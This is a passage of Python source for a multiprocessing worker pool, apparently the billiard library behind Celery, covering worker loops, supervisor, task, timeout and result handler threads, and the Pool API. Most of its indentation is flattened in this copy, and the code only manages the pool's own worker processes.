raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
_controlled_termination = False
_job_terminated = False
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), signal.SIGTERM)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
            # Keep maintaining workers until the cache gets drained, unless
            # the pool is terminated.
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
super(TaskHandler, self).__init__()
def body(self):
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
try:
i = -1
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception as exc:
error('Task Handler ERROR: %r', exc, exc_info=1)
break
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool)
if threads:
self._task_handler.start()
# Thread killing timedout jobs.
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
if self.timeout is not None or self.soft_timeout is not None:
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
self.check_timeouts = None
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._ctx.Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
        reaching their specified lifetime. Returns a list of the exit codes
        of the workers that were cleaned up (empty if none were).
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
                    debug('Supervisor: worker %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
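    # Hedged illustration (editor's addition, not in the original source):
    # with chunksize == 1 each input item becomes its own task, and
    # imap_unordered() yields results as workers finish, e.g.
    #
    #   for value in pool.imap_unordered(slow_func, range(10)):
    #       ...        # order reflects completion time, not input order
    #
    # whereas imap() yields results in input order, buffering out-of-order
    # completions internally (see IMapIterator._set further below).
    # ``slow_func`` is a hypothetical worker function used for illustration.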
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
        Callback is called when the function's return value is ready.
        The accept callback is called when the job is accepted to be executed.
        Simplified, the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
